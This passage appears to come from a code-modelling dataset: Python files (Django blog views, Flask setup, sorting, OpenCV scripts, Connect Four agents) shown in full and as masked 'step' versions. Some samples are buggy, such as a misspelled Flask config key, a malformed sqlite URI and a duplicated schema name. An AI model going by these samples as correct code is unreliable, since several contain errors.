# print Article.objects.values('date_publish').distinct()\n # 直接执行原生sql呢?\n # 第一种方式(不可行)\n # archive_list =Article.objects.raw('SELECT id, DATE_FORMAT(date_publish, \"%%Y-%%m\") as col_date FROM blog_article ORDER BY date_publish')\n # for archive in archive_list:\n # print archive\n # 第二种方式(不推荐)\n # cursor = connection.cursor()\n # cursor.execute(\"SELECT DISTINCT DATE_FORMAT(date_publish, '%Y-%m') as col_date FROM blog_article ORDER BY date_publish\")\n # row = cursor.fetchall()\n # print row\n except Exception as e:\n print e\n logger.error(e)\n return render(request, 'index.html', locals())\n\ndef archive(request):\n try:\n # 先获取客户端提交的信息\n year = request.GET.get('year', None)\n month = request.GET.get('month', None)\n article_list = Article.objects.filter(date_publish__icontains=year+'-'+month)\n article_list = getPage(request, article_list)\n except Exception as e:\n logger.error(e)\n return render(request, 'archive.html', locals())\n\n# 按标签查询对应的文章列表\ndef tag(request):\n try:\n \n pass\n\n except Exception as e:\n logger.error(e)\n return render(request, 'archive.html', locals())\n\n# 分页代码\ndef getPage(request, article_list):\n paginator = Paginator(article_list, 2)\n try:\n page = int(request.GET.get('page', 1))\n article_list = paginator.page(page)\n except (EmptyPage, InvalidPage, PageNotAnInteger):\n article_list = paginator.page(1)\n return article_list\n\n# 文章详情\ndef article(request):\n try:\n # 获取文章id\n id = request.GET.get('id', None)\n try:\n # 获取文章信息\n article = Article.objects.get(pk=id)\n except Article.DoesNotExist:\n return render(request, 'failure.html', {'reason': '没有找到对应的文章'})\n\n # 评论表单\n comment_form = CommentForm({'author': request.user.username,\n 'email': request.user.email,\n 'url': request.user.url,\n 'article': id} if request.user.is_authenticated() else{'article': id})\n # 获取评论信息\n comments = Comment.objects.filter(article=article).order_by('id')\n comment_list = []\n for comment in comments:\n for item in comment_list:\n if not hasattr(item, 'children_comment'):\n setattr(item, 'children_comment', [])\n if comment.pid == item:\n item.children_comment.append(comment)\n break\n if comment.pid is None:\n comment_list.append(comment)\n except Exception as e:\n print e\n logger.error(e)\n return render(request, 'article.html', locals())\n\n# 提交评论\ndef comment_post(request):\n try:\n comment_form = CommentForm(request.POST)\n if comment_form.is_valid():\n #获取表单信息\n comment = Comment.objects.create(username=comment_form.cleaned_data[\"author\"],\n email=comment_form.cleaned_data[\"email\"],\n url=comment_form.cleaned_data[\"url\"],\n content=comment_form.cleaned_data[\"comment\"],\n article_id=comment_form.cleaned_data[\"article\"],\n user=request.user if request.user.is_authenticated() else None)\n comment.save()\n else:\n return render(request, 'failure.html', {'reason': comment_form.errors})\n except Exception as e:\n logger.error(e)\n return redirect(request.META['HTTP_REFERER'])\n\n# 注销\ndef do_logout(request):\n try:\n logout(request)\n except Exception as e:\n print e\n logger.error(e)\n return redirect(request.META['HTTP_REFERER'])\n\n# 注册\ndef do_reg(request):\n try:\n if request.method == 'POST':\n reg_form = RegForm(request.POST)\n if reg_form.is_valid():\n # 注册\n user = User.objects.create(username=reg_form.cleaned_data[\"username\"],\n email=reg_form.cleaned_data[\"email\"],\n url=reg_form.cleaned_data[\"url\"],\n password=make_password(reg_form.cleaned_data[\"password\"]),)\n user.save()\n\n # 登录\n user.backend = 'django.contrib.auth.backends.ModelBackend' # 指定默认的登录验证方式\n login(request, user)\n return redirect(request.POST.get('source_url'))\n else:\n return render(request, 'failure.html', {'reason': reg_form.errors})\n else:\n reg_form = RegForm()\n except Exception as e:\n logger.error(e)\n return render(request, 'reg.html', locals())\n\n# 登录\ndef do_login(request):\n try:\n if request.method == 'POST':\n login_form = LoginForm(request.POST)\n if login_form.is_valid():\n # 登录\n username = login_form.cleaned_data[\"username\"]\n password = login_form.cleaned_data[\"password\"]\n user = authenticate(username=username, password=password)\n if user is not None:\n user.backend = 'django.contrib.auth.backends.ModelBackend' # 指定默认的登录验证方式\n login(request, user)\n else:\n return render(request, 'failure.html', {'reason': '登录验证失败'})\n return redirect(request.POST.get('source_url'))\n else:\n return render(request, 'failure.html', {'reason': login_form.errors})\n else:\n login_form = LoginForm()\n except Exception as e:\n logger.error(e)\n return render(request, 'login.html', locals())\n\ndef category(request):\n try:\n # 先获取客户端提交的信息\n cid = request.GET.get('cid', None)\n try:\n category = Category.objects.get(pk=cid)\n except Category.DoesNotExist:\n return render(request, 'failure.html', {'reason': '分类不存在'})\n article_list = Article.objects.filter(category=category)\n article_list = getPage(request, article_list)\n except Exception as e:\n logger.error(e)\n return render(request, 'category.html', locals())\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
if __name__ == '__main__': print('--------------------------------------') query = 'user=pilgrim&database=master&password=PapayaWhip' a_list = query.split('&') print(a_list) print('--------------------------------------') a_list_of_lists = [v.split('=', 1) for v in a_list if '=' in v] print(a_list_of_lists) a_dict = dict(a_list_of_lists) print(a_dict) print('--------------------------------------') a_string = 'My alphabet starts where your alphabet ends.' print(a_string[3:11]) print(a_string[3:-3]) print(a_string[0:2]) print(a_string[:18]) print(a_string[18:])
normal
{ "blob_id": "5c3bf49f88dec429ec85cceb8130cccf2691363b", "index": 1538, "step-1": "<mask token>\n", "step-2": "if __name__ == '__main__':\n print('--------------------------------------')\n query = 'user=pilgrim&database=master&password=PapayaWhip'\n a_list = query.split('&')\n print(a_list)\n print('--------------------------------------')\n a_list_of_lists = [v.split('=', 1) for v in a_list if '=' in v]\n print(a_list_of_lists)\n a_dict = dict(a_list_of_lists)\n print(a_dict)\n print('--------------------------------------')\n a_string = 'My alphabet starts where your alphabet ends.'\n print(a_string[3:11])\n print(a_string[3:-3])\n print(a_string[0:2])\n print(a_string[:18])\n print(a_string[18:])\n", "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0, 1 ] }
[ 0, 1 ]
#!/usr/bin/env python # -*- coding: utf-8 -*- import sys import random import helper as hp def insertion_sort(items, start, end): """ Arguments: - `items`: """ n = end - start + 1 for i in range(start+1, end+1): for j in range(i, start, -1): if items[j] < items[j-1]: items[j], items[j-1] = items[j-1], items[j] else: break return items def merge_sort(items): aux = items[:] def merge(lo, mid, hi): # copy lo ... hi to aux if items[mid] <= items[mid+1]: return aux[lo:mid+1] = items[lo:mid+1] # copy the right half in decreasing order aux[mid+1:hi+1] = items[mid+1:hi+1][::-1] head, tail = lo, hi for k in range(lo, hi+1): if aux[head] < aux[tail]: items[k] = aux[head] head += 1 else: items[k] = aux[tail] tail -= 1 def merge_sort_wrapper(lo, hi): if hi <= lo: return # use insertion sort for omall pieces if (hi - lo) < 5: insertion_sort(items, lo, hi) return mid = (lo + hi) / 2 merge_sort_wrapper(lo, mid) merge_sort_wrapper(mid+1, hi) merge(lo, mid, hi) merge_sort_wrapper(0, len(items) - 1) if __name__ == '__main__': items = [random.randint(1, 1000) for _ in xrange(20)] print items merge_sort(items) print items
normal
{ "blob_id": "e2e34db52e17c188cab63a870f0bc77cbc9ef922", "index": 3355, "step-1": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport random\n\nimport helper as hp\n\ndef insertion_sort(items, start, end):\n \"\"\"\n\n Arguments:\n - `items`:\n \"\"\"\n n = end - start + 1\n for i in range(start+1, end+1):\n for j in range(i, start, -1):\n if items[j] < items[j-1]:\n items[j], items[j-1] = items[j-1], items[j]\n else:\n break\n return items\n\ndef merge_sort(items):\n aux = items[:]\n def merge(lo, mid, hi):\n # copy lo ... hi to aux\n if items[mid] <= items[mid+1]:\n return\n aux[lo:mid+1] = items[lo:mid+1]\n # copy the right half in decreasing order\n aux[mid+1:hi+1] = items[mid+1:hi+1][::-1]\n head, tail = lo, hi\n for k in range(lo, hi+1):\n if aux[head] < aux[tail]:\n items[k] = aux[head]\n head += 1\n else:\n items[k] = aux[tail]\n tail -= 1\n def merge_sort_wrapper(lo, hi):\n if hi <= lo:\n return\n # use insertion sort for omall pieces\n if (hi - lo) < 5:\n insertion_sort(items, lo, hi)\n return\n mid = (lo + hi) / 2\n merge_sort_wrapper(lo, mid)\n merge_sort_wrapper(mid+1, hi)\n merge(lo, mid, hi)\n merge_sort_wrapper(0, len(items) - 1)\n\nif __name__ == '__main__':\n items = [random.randint(1, 1000) for _ in xrange(20)]\n print items\n merge_sort(items)\n print items\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
# -*- coding: utf-8 -*- class Library(object): def __init__(self, backend): self._backend = backend @property def cache(self): return self._backend.cache def cache_key(self, key): return self._backend.cache_key(key) def get_url(self, track): raise NotImplementedError()
normal
{ "blob_id": "ccee0e3c47fd3809e0670be24aaa6fd0a9bad3bc", "index": 888, "step-1": "class Library(object):\n <mask token>\n <mask token>\n\n def cache_key(self, key):\n return self._backend.cache_key(key)\n <mask token>\n", "step-2": "class Library(object):\n <mask token>\n <mask token>\n\n def cache_key(self, key):\n return self._backend.cache_key(key)\n\n def get_url(self, track):\n raise NotImplementedError()\n", "step-3": "class Library(object):\n\n def __init__(self, backend):\n self._backend = backend\n <mask token>\n\n def cache_key(self, key):\n return self._backend.cache_key(key)\n\n def get_url(self, track):\n raise NotImplementedError()\n", "step-4": "class Library(object):\n\n def __init__(self, backend):\n self._backend = backend\n\n @property\n def cache(self):\n return self._backend.cache\n\n def cache_key(self, key):\n return self._backend.cache_key(key)\n\n def get_url(self, track):\n raise NotImplementedError()\n", "step-5": "# -*- coding: utf-8 -*-\n\n\nclass Library(object):\n\n def __init__(self, backend):\n self._backend = backend\n\n @property\n def cache(self):\n return self._backend.cache\n\n def cache_key(self, key):\n return self._backend.cache_key(key)\n\n def get_url(self, track):\n raise NotImplementedError()\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
import cv2 as cv import numpy as np import sys from meio_tom_lib import * imgname = sys.argv[1] imgpath = "img/" + imgname try: img = cv.imread(imgpath) newimg1 = jarvis_judice_ninke_1(img)*255 newimg2 = jarvis_judice_ninke_2(img)*255 cv.imshow("Imagem original",img) cv.imshow("Jarvis, Judice e Ninke metodo 1",newimg1) cv.imshow("Jarvis, Judice e Ninke metodo 2",newimg2) print("") cv.imwrite('resultados/jarvis_judice_ninke/jarvis_judice_ninke_1-'+imgname,newimg1) cv.imwrite('resultados/jarvis_judice_ninke/jarvis_judice_ninke_2-'+imgname,newimg2) print("Resultados salvos em:") print('resultados/jarvis_judice_ninke/jarvis_judice_ninke_1-'+imgname) print('resultados/jarvis_judice_ninke/jarvis_judice_ninke_2-'+imgname) cv.waitKey(0) cv.destroyAllWindows() except: print("Erro")
normal
{ "blob_id": "bf764457e6af25d2d9406b18af51f63b36ab823a", "index": 8564, "step-1": "<mask token>\n", "step-2": "<mask token>\ntry:\n img = cv.imread(imgpath)\n newimg1 = jarvis_judice_ninke_1(img) * 255\n newimg2 = jarvis_judice_ninke_2(img) * 255\n cv.imshow('Imagem original', img)\n cv.imshow('Jarvis, Judice e Ninke metodo 1', newimg1)\n cv.imshow('Jarvis, Judice e Ninke metodo 2', newimg2)\n print('')\n cv.imwrite('resultados/jarvis_judice_ninke/jarvis_judice_ninke_1-' +\n imgname, newimg1)\n cv.imwrite('resultados/jarvis_judice_ninke/jarvis_judice_ninke_2-' +\n imgname, newimg2)\n print('Resultados salvos em:')\n print('resultados/jarvis_judice_ninke/jarvis_judice_ninke_1-' + imgname)\n print('resultados/jarvis_judice_ninke/jarvis_judice_ninke_2-' + imgname)\n cv.waitKey(0)\n cv.destroyAllWindows()\nexcept:\n print('Erro')\n", "step-3": "<mask token>\nimgname = sys.argv[1]\nimgpath = 'img/' + imgname\ntry:\n img = cv.imread(imgpath)\n newimg1 = jarvis_judice_ninke_1(img) * 255\n newimg2 = jarvis_judice_ninke_2(img) * 255\n cv.imshow('Imagem original', img)\n cv.imshow('Jarvis, Judice e Ninke metodo 1', newimg1)\n cv.imshow('Jarvis, Judice e Ninke metodo 2', newimg2)\n print('')\n cv.imwrite('resultados/jarvis_judice_ninke/jarvis_judice_ninke_1-' +\n imgname, newimg1)\n cv.imwrite('resultados/jarvis_judice_ninke/jarvis_judice_ninke_2-' +\n imgname, newimg2)\n print('Resultados salvos em:')\n print('resultados/jarvis_judice_ninke/jarvis_judice_ninke_1-' + imgname)\n print('resultados/jarvis_judice_ninke/jarvis_judice_ninke_2-' + imgname)\n cv.waitKey(0)\n cv.destroyAllWindows()\nexcept:\n print('Erro')\n", "step-4": "import cv2 as cv\nimport numpy as np\nimport sys\nfrom meio_tom_lib import *\nimgname = sys.argv[1]\nimgpath = 'img/' + imgname\ntry:\n img = cv.imread(imgpath)\n newimg1 = jarvis_judice_ninke_1(img) * 255\n newimg2 = jarvis_judice_ninke_2(img) * 255\n cv.imshow('Imagem original', img)\n cv.imshow('Jarvis, Judice e Ninke metodo 1', newimg1)\n cv.imshow('Jarvis, Judice e Ninke metodo 2', newimg2)\n print('')\n cv.imwrite('resultados/jarvis_judice_ninke/jarvis_judice_ninke_1-' +\n imgname, newimg1)\n cv.imwrite('resultados/jarvis_judice_ninke/jarvis_judice_ninke_2-' +\n imgname, newimg2)\n print('Resultados salvos em:')\n print('resultados/jarvis_judice_ninke/jarvis_judice_ninke_1-' + imgname)\n print('resultados/jarvis_judice_ninke/jarvis_judice_ninke_2-' + imgname)\n cv.waitKey(0)\n cv.destroyAllWindows()\nexcept:\n print('Erro')\n", "step-5": "import cv2 as cv\nimport numpy as np\nimport sys\nfrom meio_tom_lib import *\n\nimgname = sys.argv[1]\nimgpath = \"img/\" + imgname\n\n\ntry:\n img = cv.imread(imgpath)\n\n newimg1 = jarvis_judice_ninke_1(img)*255\n newimg2 = jarvis_judice_ninke_2(img)*255\n\n cv.imshow(\"Imagem original\",img)\n cv.imshow(\"Jarvis, Judice e Ninke metodo 1\",newimg1)\n cv.imshow(\"Jarvis, Judice e Ninke metodo 2\",newimg2)\n\n print(\"\")\n\n cv.imwrite('resultados/jarvis_judice_ninke/jarvis_judice_ninke_1-'+imgname,newimg1)\n cv.imwrite('resultados/jarvis_judice_ninke/jarvis_judice_ninke_2-'+imgname,newimg2)\n\n print(\"Resultados salvos em:\")\n print('resultados/jarvis_judice_ninke/jarvis_judice_ninke_1-'+imgname)\n print('resultados/jarvis_judice_ninke/jarvis_judice_ninke_2-'+imgname)\n\n cv.waitKey(0)\n cv.destroyAllWindows()\n \nexcept:\n print(\"Erro\")", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import cv2 import numpy as np result=cv2.VideoCapture(0) while True: ret,square=result.read() area=square[100:200,100:200] cv2.imshow("video",square) cv2.imshow("video2",area) print(square) if cv2.waitKey(25) & 0xff == ord('q'): break result.release() cv2.destroyAllWindows()
normal
{ "blob_id": "934921b22d036bd611134ce74f6eba3a2710018e", "index": 529, "step-1": "<mask token>\n", "step-2": "<mask token>\nwhile True:\n ret, square = result.read()\n area = square[100:200, 100:200]\n cv2.imshow('video', square)\n cv2.imshow('video2', area)\n print(square)\n if cv2.waitKey(25) & 255 == ord('q'):\n break\nresult.release()\ncv2.destroyAllWindows()\n", "step-3": "<mask token>\nresult = cv2.VideoCapture(0)\nwhile True:\n ret, square = result.read()\n area = square[100:200, 100:200]\n cv2.imshow('video', square)\n cv2.imshow('video2', area)\n print(square)\n if cv2.waitKey(25) & 255 == ord('q'):\n break\nresult.release()\ncv2.destroyAllWindows()\n", "step-4": "import cv2\nimport numpy as np\nresult = cv2.VideoCapture(0)\nwhile True:\n ret, square = result.read()\n area = square[100:200, 100:200]\n cv2.imshow('video', square)\n cv2.imshow('video2', area)\n print(square)\n if cv2.waitKey(25) & 255 == ord('q'):\n break\nresult.release()\ncv2.destroyAllWindows()\n", "step-5": "import cv2\nimport numpy as np\n\n\nresult=cv2.VideoCapture(0)\n\nwhile True:\n ret,square=result.read()\n area=square[100:200,100:200]\n cv2.imshow(\"video\",square)\n cv2.imshow(\"video2\",area)\n print(square)\n\n if cv2.waitKey(25) & 0xff == ord('q'):\n break\nresult.release()\ncv2.destroyAllWindows()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from flask import Flask, request, jsonify from flask_sqlalchemy import SQLAlchemy from flask_marshmallow import Marshmallow import os # Init app app = Flask(__name__) basedir = os.path.abspath(os.path.dirname(__file__)) # Database app.config['SQLALCHEM_DATABASE_URI'] = 'sqlite///' + \ os.path.join(basedir, 'db.sqlite') app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False # Init db db = SQLAlchemy(app) # Init ma ma = Marshmallow(app) # Product Class/Model class Product(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(100), unique=True) description = db.Column(db.String(200)) price = db.Column(db.Float) qty = db.Column(db.Integer) # Product Schema class ProductSchema(ma.Schema): class Meta: fields = ('id', 'name', 'description', 'price', 'qty') # Init schema product_schema = ProductSchema(strict=True) product_schema = ProductSchema(many=True, strict=True) # Run Server if __name__ == '__main__': app.run(debug=True)
normal
{ "blob_id": "ccb131171472d0a92d571e94453be97b323b4484", "index": 7081, "step-1": "<mask token>\n\n\nclass ProductSchema(ma.Schema):\n\n\n class Meta:\n fields = 'id', 'name', 'description', 'price', 'qty'\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Product(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), unique=True)\n description = db.Column(db.String(200))\n price = db.Column(db.Float)\n qty = db.Column(db.Integer)\n\n\nclass ProductSchema(ma.Schema):\n\n\n class Meta:\n fields = 'id', 'name', 'description', 'price', 'qty'\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Product(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), unique=True)\n description = db.Column(db.String(200))\n price = db.Column(db.Float)\n qty = db.Column(db.Integer)\n\n\nclass ProductSchema(ma.Schema):\n\n\n class Meta:\n fields = 'id', 'name', 'description', 'price', 'qty'\n\n\n<mask token>\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-4": "<mask token>\napp = Flask(__name__)\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SQLALCHEM_DATABASE_URI'] = 'sqlite///' + os.path.join(basedir,\n 'db.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n\nclass Product(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), unique=True)\n description = db.Column(db.String(200))\n price = db.Column(db.Float)\n qty = db.Column(db.Integer)\n\n\nclass ProductSchema(ma.Schema):\n\n\n class Meta:\n fields = 'id', 'name', 'description', 'price', 'qty'\n\n\nproduct_schema = ProductSchema(strict=True)\nproduct_schema = ProductSchema(many=True, strict=True)\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-5": "from flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nimport os\n\n# Init app\napp = Flask(__name__)\nbasedir = os.path.abspath(os.path.dirname(__file__))\n# Database\napp.config['SQLALCHEM_DATABASE_URI'] = 'sqlite///' + \\\n os.path.join(basedir, 'db.sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n# Init db\ndb = SQLAlchemy(app)\n# Init ma\nma = Marshmallow(app)\n\n# Product Class/Model\n\n\nclass Product(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(100), unique=True)\n description = db.Column(db.String(200))\n price = db.Column(db.Float)\n qty = db.Column(db.Integer)\n\n \n\n# Product Schema\n\n\nclass ProductSchema(ma.Schema):\n class Meta:\n fields = ('id', 'name', 'description', 'price', 'qty')\n\n\n# Init schema\nproduct_schema = ProductSchema(strict=True)\nproduct_schema = ProductSchema(many=True, strict=True)\n\n\n\n# Run Server\nif __name__ == '__main__':\n app.run(debug=True)\n", "step-ids": [ 1, 3, 4, 5, 7 ] }
[ 1, 3, 4, 5, 7 ]
import random from connectfour.agents.monte_carlo import Node, MTCS from connectfour.agents.agent import Agent MAX_DEPTH = 3 class MonteCarloAgent(Agent): def __init__(self, name): super().__init__(name) def get_move(self, board): best_move = self.find_best_move(board) return self._find_move_from_new_board_state(board.board, best_move.state.board) def find_best_move(self, board, factor=2.0): """ Returns the best move using MonteCarlo Tree Search """ o = Node(board) return MTCS(MAX_DEPTH, o, factor, self.id) def _find_move_from_new_board_state(self, old, new): """ Making a move in Connect Four makes exactly one change to the board. Searching through all x,y positions for a difference between the old and new board will tell us exactly where a move was made. """ for x in range(len(old)): for y in range(len(old[0])): if old[x][y] != new[x][y]: return x, y # there is no difference between old and new board states return -1, -1 class RandomAgent(Agent): def __init__(self, name): super().__init__(name) def get_move(self, board): """ RandomAgent always returns a valid (ie. partially empty) column to place token in """ while True: col = random.randint(0, board.width) row = board.try_move(col) if row >= 0: break return row, col
normal
{ "blob_id": "e99cf5a7058db984b323af1375003e4e21e36612", "index": 9305, "step-1": "<mask token>\n\n\nclass MonteCarloAgent(Agent):\n <mask token>\n <mask token>\n <mask token>\n\n def _find_move_from_new_board_state(self, old, new):\n \"\"\"\n Making a move in Connect Four makes exactly one change to the board.\n Searching through all x,y positions for a difference between the old and\n new board will tell us exactly where a move was made.\n \"\"\"\n for x in range(len(old)):\n for y in range(len(old[0])):\n if old[x][y] != new[x][y]:\n return x, y\n return -1, -1\n\n\nclass RandomAgent(Agent):\n\n def __init__(self, name):\n super().__init__(name)\n\n def get_move(self, board):\n \"\"\"\n RandomAgent always returns a valid (ie. partially empty) column to place token in\n \"\"\"\n while True:\n col = random.randint(0, board.width)\n row = board.try_move(col)\n if row >= 0:\n break\n return row, col\n", "step-2": "<mask token>\n\n\nclass MonteCarloAgent(Agent):\n\n def __init__(self, name):\n super().__init__(name)\n\n def get_move(self, board):\n best_move = self.find_best_move(board)\n return self._find_move_from_new_board_state(board.board, best_move.\n state.board)\n\n def find_best_move(self, board, factor=2.0):\n \"\"\"\n Returns the best move using MonteCarlo Tree Search\n \"\"\"\n o = Node(board)\n return MTCS(MAX_DEPTH, o, factor, self.id)\n\n def _find_move_from_new_board_state(self, old, new):\n \"\"\"\n Making a move in Connect Four makes exactly one change to the board.\n Searching through all x,y positions for a difference between the old and\n new board will tell us exactly where a move was made.\n \"\"\"\n for x in range(len(old)):\n for y in range(len(old[0])):\n if old[x][y] != new[x][y]:\n return x, y\n return -1, -1\n\n\nclass RandomAgent(Agent):\n\n def __init__(self, name):\n super().__init__(name)\n\n def get_move(self, board):\n \"\"\"\n RandomAgent always returns a valid (ie. partially empty) column to place token in\n \"\"\"\n while True:\n col = random.randint(0, board.width)\n row = board.try_move(col)\n if row >= 0:\n break\n return row, col\n", "step-3": "<mask token>\nMAX_DEPTH = 3\n\n\nclass MonteCarloAgent(Agent):\n\n def __init__(self, name):\n super().__init__(name)\n\n def get_move(self, board):\n best_move = self.find_best_move(board)\n return self._find_move_from_new_board_state(board.board, best_move.\n state.board)\n\n def find_best_move(self, board, factor=2.0):\n \"\"\"\n Returns the best move using MonteCarlo Tree Search\n \"\"\"\n o = Node(board)\n return MTCS(MAX_DEPTH, o, factor, self.id)\n\n def _find_move_from_new_board_state(self, old, new):\n \"\"\"\n Making a move in Connect Four makes exactly one change to the board.\n Searching through all x,y positions for a difference between the old and\n new board will tell us exactly where a move was made.\n \"\"\"\n for x in range(len(old)):\n for y in range(len(old[0])):\n if old[x][y] != new[x][y]:\n return x, y\n return -1, -1\n\n\nclass RandomAgent(Agent):\n\n def __init__(self, name):\n super().__init__(name)\n\n def get_move(self, board):\n \"\"\"\n RandomAgent always returns a valid (ie. partially empty) column to place token in\n \"\"\"\n while True:\n col = random.randint(0, board.width)\n row = board.try_move(col)\n if row >= 0:\n break\n return row, col\n", "step-4": "import random\nfrom connectfour.agents.monte_carlo import Node, MTCS\nfrom connectfour.agents.agent import Agent\nMAX_DEPTH = 3\n\n\nclass MonteCarloAgent(Agent):\n\n def __init__(self, name):\n super().__init__(name)\n\n def get_move(self, board):\n best_move = self.find_best_move(board)\n return self._find_move_from_new_board_state(board.board, best_move.\n state.board)\n\n def find_best_move(self, board, factor=2.0):\n \"\"\"\n Returns the best move using MonteCarlo Tree Search\n \"\"\"\n o = Node(board)\n return MTCS(MAX_DEPTH, o, factor, self.id)\n\n def _find_move_from_new_board_state(self, old, new):\n \"\"\"\n Making a move in Connect Four makes exactly one change to the board.\n Searching through all x,y positions for a difference between the old and\n new board will tell us exactly where a move was made.\n \"\"\"\n for x in range(len(old)):\n for y in range(len(old[0])):\n if old[x][y] != new[x][y]:\n return x, y\n return -1, -1\n\n\nclass RandomAgent(Agent):\n\n def __init__(self, name):\n super().__init__(name)\n\n def get_move(self, board):\n \"\"\"\n RandomAgent always returns a valid (ie. partially empty) column to place token in\n \"\"\"\n while True:\n col = random.randint(0, board.width)\n row = board.try_move(col)\n if row >= 0:\n break\n return row, col\n", "step-5": "import random\n\nfrom connectfour.agents.monte_carlo import Node, MTCS\nfrom connectfour.agents.agent import Agent\n\nMAX_DEPTH = 3\n\n\nclass MonteCarloAgent(Agent):\n def __init__(self, name):\n super().__init__(name)\n\n def get_move(self, board):\n best_move = self.find_best_move(board)\n return self._find_move_from_new_board_state(board.board, best_move.state.board)\n\n def find_best_move(self, board, factor=2.0):\n \"\"\"\n Returns the best move using MonteCarlo Tree Search\n \"\"\"\n o = Node(board)\n return MTCS(MAX_DEPTH, o, factor, self.id)\n\n def _find_move_from_new_board_state(self, old, new):\n \"\"\"\n Making a move in Connect Four makes exactly one change to the board.\n Searching through all x,y positions for a difference between the old and\n new board will tell us exactly where a move was made.\n \"\"\"\n for x in range(len(old)):\n for y in range(len(old[0])):\n if old[x][y] != new[x][y]:\n return x, y\n\n # there is no difference between old and new board states\n return -1, -1\n\n\nclass RandomAgent(Agent):\n def __init__(self, name):\n super().__init__(name)\n\n def get_move(self, board):\n \"\"\"\n RandomAgent always returns a valid (ie. partially empty) column to place token in\n \"\"\"\n while True:\n col = random.randint(0, board.width)\n row = board.try_move(col)\n\n if row >= 0:\n break\n\n return row, col\n", "step-ids": [ 5, 8, 9, 10, 11 ] }
[ 5, 8, 9, 10, 11 ]
# Generated by Django 3.2.5 on 2021-07-27 17:12 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Category', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=20)), ], ), migrations.CreateModel( name='Task', fields=[ ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=50, null=True)), ('description', models.CharField(max_length=500)), ('priority', models.IntegerField(choices=[(0, 'unimportant'), (1, 'insignificant'), (2, 'important'), (3, 'Necessary')], default=0)), ('status', models.CharField(choices=[('deleted', 'deleted'), ('doing', 'doing'), ('done', 'done'), ('expire', 'expire'), ('archive', 'archive')], default='doing', max_length=10)), ('expired', models.DateTimeField(blank=True, null=True)), ('created', models.DateTimeField(auto_now_add=True)), ('updated', models.DateTimeField(auto_now=True)), ('category', models.ManyToManyField(default='unknown', to='todo.Category')), ], ), ]
normal
{ "blob_id": "d145f4c061c8f364756012832a07adc305e35e5c", "index": 5772, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Category', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('title', models.CharField(max_length=\n 20))]), migrations.CreateModel(name='Task', fields=[('id', models.\n BigAutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('title', models.CharField(max_length=50, null\n =True)), ('description', models.CharField(max_length=500)), (\n 'priority', models.IntegerField(choices=[(0, 'unimportant'), (1,\n 'insignificant'), (2, 'important'), (3, 'Necessary')], default=0)),\n ('status', models.CharField(choices=[('deleted', 'deleted'), (\n 'doing', 'doing'), ('done', 'done'), ('expire', 'expire'), (\n 'archive', 'archive')], default='doing', max_length=10)), (\n 'expired', models.DateTimeField(blank=True, null=True)), ('created',\n models.DateTimeField(auto_now_add=True)), ('updated', models.\n DateTimeField(auto_now=True)), ('category', models.ManyToManyField(\n default='unknown', to='todo.Category'))])]\n", "step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='Category', fields=[('id',\n models.BigAutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('title', models.CharField(max_length=\n 20))]), migrations.CreateModel(name='Task', fields=[('id', models.\n BigAutoField(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')), ('title', models.CharField(max_length=50, null\n =True)), ('description', models.CharField(max_length=500)), (\n 'priority', models.IntegerField(choices=[(0, 'unimportant'), (1,\n 'insignificant'), (2, 'important'), (3, 'Necessary')], default=0)),\n ('status', models.CharField(choices=[('deleted', 'deleted'), (\n 'doing', 'doing'), ('done', 'done'), ('expire', 'expire'), (\n 'archive', 'archive')], default='doing', max_length=10)), (\n 'expired', models.DateTimeField(blank=True, null=True)), ('created',\n models.DateTimeField(auto_now_add=True)), ('updated', models.\n DateTimeField(auto_now=True)), ('category', models.ManyToManyField(\n default='unknown', to='todo.Category'))])]\n", "step-5": "# Generated by Django 3.2.5 on 2021-07-27 17:12\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n initial = True\r\n\r\n dependencies = [\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='Category',\r\n fields=[\r\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n 